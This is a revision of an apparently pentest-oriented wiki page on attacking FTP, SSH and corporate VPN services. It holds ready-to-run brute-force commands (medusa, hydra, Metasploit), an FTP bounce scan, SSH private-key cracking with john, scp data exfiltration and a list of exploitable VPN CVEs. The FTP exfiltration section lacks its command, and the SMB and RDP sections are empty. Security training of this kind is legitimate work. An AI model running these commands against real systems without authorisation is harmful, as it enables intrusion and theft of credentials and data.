Common Service Attacks: Difference between revisions
m (→Cisco) |
|||
| Line 99: | Line 99: | ||
===== Cisco ===== | ===== Cisco ===== | ||
<pre> | <pre> | ||
msfconsole | msfconsole | ||
use auxiliary/scanner/http/cisco_ssl_vpn | use auxiliary/scanner/http/cisco_ssl_vpn | ||
Revision as of 13:42, 22 September 2023
NOTE: This page is under construction
Services
Network services as listed below commonly run standard default ports. Whilst most of your targets (especially internally) may run on default standard ports that you would expect services to run on it's important to look for non-standard, high ports as some sysadmins run their infrastructure under "Security Through Obscurity". To do this we can use third-party services such as Shodan and Censys and port scanners such as nmap.
FTP
File Transfer Protocol (FTP) is commonly used to store and transfer files and runs on port 21 by default. FTP if configured properly cannot be accessed without being vulnerable or using weak credentials. However if the server has misconfigurations (anonymous authentication) and weak credentials are in place then potentially it can be accessed. After which we can login, see if we have write permissions, steal data or upload a web shell to perform further post exploitation and lateral movement.
- FTP Security: https://datatracker.ietf.org/doc/html/rfc2577
- FTP hacking cheat sheet: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ftp
Basic FTP authentication (CLI):
- Basic FTP login:
ftp 10.10.10.11 21 - Feature rich (CLI) FTP client:
ncftp -u admin -p Password123 10.10.10.11 - A nice feature rich GUI FTP client: https://filezilla-project.org
Anonymous Login
A common security oversight and misconfiguration is an FTP server allowing anonymous login and it becomes even better if we have write permissions! To check for this misconfifration you can either manually try and login with anonymous:anonymous or use the nmap scripting engine to check automatically for you.
Check for FTP anonymous login:
ftp 10.10.10.11(anonymous:anonymous)sudo nmap -sC -sV 10.10.10.11 -p 21 -oA results
Brute-Force
Brute-Force attacks stuff logins with thousands and hundreds of thousands (even millions) of login attempts using a password word list against a user or a list of users guessing the users password until it finds the right one. If we cant get access to the FTP using the anonymous login method and assuming the sysadmin uses weak and guessable credentials we may be able to brute-force the login and break our way in. Note that this is a very loud and proud method and is not recommended if you're trying to be stealthy.
Brute-force using medusa and rockyou:
medusa -u admin -P /usr/share/wordlists/rockyou.txt -h 10.10.10.11 -M ftp
FTP Bounce
An FTP Bounce attack is an old attack against FTP where we can effectively use the target (hacked) server as a proxy to access other internal systems on the network externally. We can use this method to port scan an internal network however this is by default not available on modern FTP servers but is still worth checking for just in case your target is vulnerable to this attack.
nmap -Pn -v -n -p 80 -b anonymous:anonymous@10.10.10.11 <internal address>
Exfiltration
Once you find your way into an FTP server which has data that you want to exfiltrate on mass you can use wget to mass exfiltrate all the data from the server to your server.
Exfiltrate all data from the target server:
SSH
Secure shell (SSH) used commonly to remotely login to Linux servers by default runs on port 22, often changed to port 2222 and has root user enabled with password authentication allowed. Most secure SSH servers will use key authentication with the root user disabled for remote authentication and will change the default port to a non-standard port to either try and hide the SSH or reduce the noise that bots make spraying the logins all day.
- SSH Hacking Cheat Sheet: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh
Brute-Force
A common attack vector used against SSH is a password based attack where you pump the server logs full of passwords and usernames until a match is found and then we're able to login.
hydra -u root -P /usr/share/wordlists/rockyou.txt 10.10.10.11 -s 22 ssh
We can also use metasploit (auxiliary/scanner/ssh/ssh_login, scanner/ssh/ssh_enumusers, auxiliary/fuzzers/ssh/ssh_version_2) to perform a brute-force attack against SSH:
msfconsole use auxiliary/scanner/ssh/ssh_login set USERNAME root set PASS_FILE /usr/share/wordlists/password/rockyou.txt set RHOSTS 10.10.10.11 set RPORT 22 set STOP_ON_SUCCESS true run
Cracking Keys
Perhaps you have found a local file inclusion (LFI) vulnerability on your targets server and you exploit this not only to retrieve the /etc/passwd file but also to retrieve the servers SSH private key (/home/user/.ssh/id_rsa). However the key is password protected and as such we'll need to crack it in order to be able to use it to remotely authenticate onto the target server.
- To begin cat the id_rsa file and copy into a local file in order to crack.
- Create hash:
python /usr/share/john/ssh2john.py id_rsa > id_rsa_crackme.txt - Crack the hash:
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_crackme.txt - Now change the file permissions to
chmod 600 id_rsa - Now we use the cracked key to ssh into our target!
ssh -i id_rsa user@10.10.10.11
Assuming now that you have in fact cracked the ssh private key and are able to use it to authenticate onto the server just enter the key's password once prompted and you'll be able to login successfully.
Exfiltration
To exfiltrate data via SSH unless otherwise through the means of a backdoor is by using secure copy (scp) where we can copy files off the server and onto ours to exfiltrate our targets data.
scp user@10.10.10.11:/home/ubuntu/super_secret_data.tar.gz ~/Downloads
SMB
RDP
VPN
Virtual Private Networks in the corporate sense (VPNs) are used to connect remotely into the corporations internal network from anywhere outside the network. This allows employees, IT staff, help desk and third parties to connect and access internal resources. We can abuse this trust relationship by either hacking the VPN through common and known vulnerabilities or we can brute-force/password spray looking to find weak and guessable credentials where the accounts don't implement multi-factor authentication.
Vulnerabilities
There are many critical vulnerabilities that affect many different VPNs which we can scan and exploit to gain initial access into your targets network. Here we list some (not all) critical VPN vulnerabilities that are worth scanning for and exploiting.
- CVE-2018-13379
- CVE-2019-11510
- CVE-2019-19781
- CVE-2019-11539
- CVE-2020-8260
- CVE-2021-20016
- CVE-2022-42475
Brute-Force
For this we can two use metasploit modules for two very common corporate VPNs, one being Fortinet SSL VPN and the other being CISCO.
Cisco
msfconsole use auxiliary/scanner/http/cisco_ssl_vpn set RHOSTS 10.10.10.11 set RPORT 443 set USER_FILE users.txt set PASS_FILE pass.txt set threads 10 run
Fortinet
sudo systemctl start postgresql msfdb init msfconsole use auxiliary/scanner/http/fortinet_ssl_vpn set RHOSTS 10.10.10.11 set RPORT 10443 set USER_FILE users.txt set PASS_FILE pass.txt set threads 10 run